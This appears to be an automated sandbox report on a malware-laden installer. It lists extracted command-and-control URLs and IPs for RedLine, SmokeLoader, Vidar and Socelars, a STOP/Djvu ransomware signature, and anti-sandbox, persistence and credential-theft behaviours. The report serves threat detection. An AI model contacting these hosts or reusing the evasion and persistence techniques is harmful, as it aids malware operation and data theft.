Analysis

max time kernel: 1053s
max time network: 1065s
submitted: 01-01-1970 00:00
Static task: static1
Behavioral task: behavioral1
Sample: setup_x86_x64_install.exe
Resource: win10-en-20210920

General

Target: setup_x86_x64_install.exe
Size: 4.6MB
MD5: 4fb905881241f7cec09bfc91858931e6
SHA1: 51aa57dd56637f8fa8332eae9c846ec5be379b95
SHA256: f2f7017a9fb071deaaee04e1cbe071d6d207e19852143148a4bc2ecf83b2195b
SHA512: 111ee308e8669d76737a92968c3420acb3cd57f4f2e5efcc2e020568a9e98bacbe4c9b2ebc361cda226484108beef323b4dd36fab9f957556e0e94dbd5246b31

Malware Config

Extracted: socelars
C2:
  http://www.iyiqian.com/
  http://www.hbgents.top/
  http://www.rsnzhy.com/
  http://www.efxety.top/

Extracted: redline
Botnet: media26
C2: 91.121.67.60:23325

Extracted: redline
Botnet: chris
C2: 194.104.136.5:46013

Extracted: smokeloader
Version: 2020
C2:
  http://brandyjaggers.com/upload/
  http://andbal.com/upload/
  http://alotofquotes.com/upload/
  http://szpnc.cn/upload/
  http://uggeboots.com/upload/
  http://100klv.com/upload/
  http://rapmusic.at/upload/

Extracted: vidar
Version: 41.6
Botnet: 933
C2: https://mas.to/@lilocc
profile_id: 933

Signatures

Djvu Ransomware
Ransomware which is a variant of the STOP family.

Process spawned unexpected child process (7 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description | pid | pid_target | process
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 6552 | 3900 | rundll32.exe
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2764 | 3900 | rundll32.exe
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 8844 | 3900 | rundll32.exe
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 8856 | 3900 | rundll32.exe
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 7244 | 3900 | rundll32.exe
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 9116 | 3900 | rundll32.exe
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 7680 | 3900 | rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (4 IoCs)
Processes:
  resource | yara_rule
  behavioral1/memory/2200-270-0x0000000000418D26-mapping.dmp | family_redline
  behavioral1/memory/2200-268-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
  behavioral1/memory/3756-289-0x0000000000418D32-mapping.dmp | family_redline
  behavioral1/memory/3756-286-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload (2 IoCs)
Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09db0d52c38.exe | family_socelars
  C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09db0d52c38.exe | family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess (2 IoCs)
Processes:
  description | pid | process | target process
  PID 5080 created 2848 | 5080 | WerFault.exe | run.exe
  PID 1496 created 5016 | 1496 | WerFault.exe | Wed09cfb2f9758281d8.exe

Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoCs)
Processes:
  description | pid | process | target process
  PID 8944 created 2888 | 8944 | regsvr32.exe | Explorer.EXE

suricata: ET MALWARE ClipBanker Variant Activity (POST)
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (POST) M2
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

Checks for common network interception software (1 TTPs)
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)

Vidar Stealer (2 IoCs)
Processes:
  resource | yara_rule
  behavioral1/memory/4680-577-0x0000000002E30000-0x0000000002F06000-memory.dmp | family_vidar
  behavioral1/memory/4680-593-0x0000000000400000-0x0000000002C15000-memory.dmp | family_vidar

Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\libcurl.dll | aspack_v212_v242
  \Users\Admin\AppData\Local\Temp\7zS8213C1D5\libcurlpp.dll | aspack_v212_v242
  \Users\Admin\AppData\Local\Temp\7zS8213C1D5\libcurl.dll | aspack_v212_v242
  \Users\Admin\AppData\Local\Temp\7zS8213C1D5\libcurl.dll | aspack_v212_v242
  C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\libcurlpp.dll | aspack_v212_v242
  C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\libstdc++-6.dll | aspack_v212_v242
  \Users\Admin\AppData\Local\Temp\7zS8213C1D5\libstdc++-6.dll | aspack_v212_v242

Blocklisted process makes network request (54 IoCs)

Downloads MZ/PE file

Drops file in Drivers directory (3 IoCs)
Processes:
  description | ioc | process
  File opened for modification | C:\Windows\system32\drivers\etc\hosts | Conhost.exe
  File opened for modification | C:\Windows\system32\drivers\etc\hosts | DYbALA.exe
  File opened for modification | C:\Windows\system32\drivers\etc\hosts | DYbALA.exe

Executes dropped EXE (64 IoCs)

Tries to connect to .bazar domain (10 IoCs)
Attempts to lookup or connect to a .bazar domain, used by BazarBackdoor, Trickbot, and potentially others.
Processes:
  flow | ioc
  1201 | whitestorm9p.bazar
  1285 | reddew28c.bazar
  1287 | whitestorm9p.bazar
  1010 | reddew28c.bazar
  1011 | bluehail.bazar
  1012 | whitestorm9p.bazar
  1013 | aqsouhyw.bazar
  1199 | reddew28c.bazar
  1200 | bluehail.bazar
  1286 | bluehail.bazar

Checks BIOS information in registry (2 TTPs, 4 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | VJLY_KstCN_8p2Gf_Rv0VShA.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | VJLY_KstCN_8p2Gf_Rv0VShA.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | kpLsXooVeYn5KXmt5cla_REP.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | kpLsXooVeYn5KXmt5cla_REP.exe

Checks computer location settings (2 TTPs, 9 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | Wed09977fdc12334.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | QUQj_70JzOWH0xslz_5jdVAu.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | Jotitojyzhae.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | Ralyxixaeco.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | Calculator.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | run2.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | Calculator.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | gkYTnqBZBqUPnzpamoekAIM0.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | Calculator.exe

Loads dropped DLL (64 IoCs)

Modifies file permissions (1 TTPs, 1 IoCs)

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 16 IoCs)
Processes:
  description | ioc | process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | oDzI6pgLfFznDi2viuJtdUSc.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Reference Assemblies\\Fugaetoduwa.exe\"" | DYbALA.exe
  Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | setup.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" | setup.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" | setup.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | 6776654.exe
  Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | oDzI6pgLfFznDi2viuJtdUSc.exe
  Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | setup.exe
  Key created | \Registry\Machine\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | cmd.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\AX40QL0P = "C:\\Program Files (x86)\\Rprqhz\\tjrixg4.exe" | cmd.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Google\\Gazhovaliha.exe\"" | Conhost.exe
  Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | setup.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" | setup.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\f9056f7f-431e-4060-84c4-36a2a3c4afc4\\ED4D.exe\" --AutoStart" | ED4D.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" | setup.exe
  Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | setup.exe

Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | kpLsXooVeYn5KXmt5cla_REP.exe
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | jg1_1faf.exe
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | VJLY_KstCN_8p2Gf_Rv0VShA.exe

Enumerates connected drives (3 TTPs, 48 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.

Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Looks up external IP address via web service (21 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Drops file in System32 directory (22 IoCs)

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
Processes:
  pid | process
  5812 | VJLY_KstCN_8p2Gf_Rv0VShA.exe
  5388 | kpLsXooVeYn5KXmt5cla_REP.exe

Suspicious use of SetThreadContext (28 IoCs)

autoit_exe (4 IoCs)
AutoIT scripts compiled to PE executables.
Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09e95ff6b5.exe | autoit_exe
  C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09e95ff6b5.exe | autoit_exe
  C:\Users\Public\run2.exe | autoit_exe
  C:\Users\Public\run2.exe | autoit_exe

Drops file in Program Files directory (34 IoCs)

Drops file in Windows directory (46 IoCs)

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 13 IoCs
Processes:
pid | pid_target | process | target process
3152 | 5016 | WerFault.exe | Wed09cfb2f9758281d8.exe
5268 | 5016 | WerFault.exe | Wed09cfb2f9758281d8.exe
5728 | 5016 | WerFault.exe | Wed09cfb2f9758281d8.exe
5948 | 5016 | WerFault.exe | Wed09cfb2f9758281d8.exe
5080 | 2848 | WerFault.exe | run.exe
6076 | 1360 | WerFault.exe | 10.exe
6072 | 1976 | WerFault.exe | 5.exe
2680 | 5088 | WerFault.exe | setup.exe
5632 | 5088 | WerFault.exe | setup.exe
4728 | 5088 | WerFault.exe | setup.exe
4252 | 5088 | WerFault.exe | setup.exe
6084 | 5016 | WerFault.exe | Wed09cfb2f9758281d8.exe
1496 | 5016 | WerFault.exe | Wed09cfb2f9758281d8.exe
-
Checks SCSI registry key(s) 3 TTPs 32 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | D800.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | uphVV8ghcsrAKvTLycJGCo_b.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | uphVV8ghcsrAKvTLycJGCo_b.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | cbwcirj
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | uswcirj
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | cbwcirj
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Wed09b2a8bc4f16cb.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 67j94FgroPgh6JIk3aUx67IB.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | uswcirj
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | cbwcirj
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Wed09b2a8bc4f16cb.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 | MicrosoftEdgeCP.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags | MicrosoftEdgeCP.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 67j94FgroPgh6JIk3aUx67IB.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 | MicrosoftEdgeCP.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | D800.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 9E51.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | D800.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags | MicrosoftEdgeCP.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags | MicrosoftEdgeCP.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | cbwcirj
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags | MicrosoftEdgeCP.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | uswcirj
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | uphVV8ghcsrAKvTLycJGCo_b.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 9E51.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | cbwcirj
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 67j94FgroPgh6JIk3aUx67IB.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 9E51.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 | MicrosoftEdgeCP.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 | MicrosoftEdgeCP.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | cbwcirj
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Wed09b2a8bc4f16cb.exe
-
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | nmDpho0Rqwv3pDRRZHOjSsDL.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | nmDpho0Rqwv3pDRRZHOjSsDL.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | FcV14WEg5407DrTsHvKslqZf.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | FcV14WEg5407DrTsHvKslqZf.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | EA22.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EA22.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | EEE4.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | svchost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | build2.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | build2.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EEE4.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | svchost.exe
-
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
7688 | schtasks.exe
2584 | schtasks.exe
3080 | schtasks.exe
1480 | schtasks.exe
6284 | schtasks.exe
1108 | schtasks.exe
8400 | schtasks.exe
-
Delays execution with timeout.exe 5 IoCs
Processes:
pid | process
6240 | timeout.exe
7220 | timeout.exe
8028 | timeout.exe
9128 | timeout.exe
2456 | timeout.exe
-
Kills process with taskkill 15 IoCs
Processes:
pid | process
2516 | taskkill.exe
1252 | taskkill.exe
3628 | taskkill.exe
6368 | taskkill.exe
5108 | taskkill.exe
7760 | taskkill.exe
4236 | taskkill.exe
724 | taskkill.exe
7180 | taskkill.exe
2248 | taskkill.exe
6232 | taskkill.exe
6520 | taskkill.exe
2916 | taskkill.exe
8364 | taskkill.exe
4224 | taskkill.exe
-
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdgeCP.exe
Key created | \Registry\User\S-1-5-21-2481030822-2828258191-1606198294-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | cmd.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
-
Modifies data under HKEY_USERS 20 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 | msiexec.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | svchost.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | svchost.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | svchost.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | svchost.exe
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 | msiexec.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" | svchost.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | svchost.exe
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E | msiexec.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | svchost.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | svchost.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache | svchost.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | svchost.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | svchost.exe
-
Modifies registry class 64 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CacheLimit = "1" | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData | MicrosoftEdge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" | MicrosoftEdgeCP.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = b152ded338cbd701 | MicrosoftEdge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$MediaWiki | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery | MicrosoftEdge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 0100000061acbe22a15dd742fb055f851ad942bf71fb560f65c04bdf96ed89c2faf16924c9402a8d6a403854857dd1b57345c7cd370433bb9d425f168c2d | MicrosoftEdge.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0" | msiexec.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore | MicrosoftEdge.exe
